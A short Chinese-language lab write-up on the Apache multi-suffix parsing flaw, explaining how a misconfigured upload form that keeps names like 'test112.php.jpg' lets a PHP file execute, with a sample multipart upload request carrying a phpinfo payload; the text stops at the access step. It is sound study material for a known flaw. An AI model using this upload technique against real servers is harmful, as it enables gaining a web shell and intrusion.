Apache 解析漏洞利用和学习

环境版本

  • PHP 7.x 最新版
  • Apache 2.4.10 稳定版(来自debian源
  • 由此可知,该漏洞与Apache、php版本无关,属于用户配置不当造成的解析漏洞。

检查机制

  • index.php中是一个白名单检查文件后缀的上传组件,上传完成后并未重命名。
  • 我们可以通过上传文件名为xxx.php.jpg或xxx.php.jpeg的文件,利用Apache解析漏洞进行getshell。

利用过程


修改上传文件名

1
2
3
4
5
6
7
------WebKitFormBoundaryQIpNoR6QLpBZBBcB
Content-Disposition: form-data; name="file_upload"; filename="test112.php.jpg"
Content-Type: image/jpeg


<?=phpinfo()?>
------WebKitFormBoundaryQIpNoR6QLpBZBBcB--


访问地址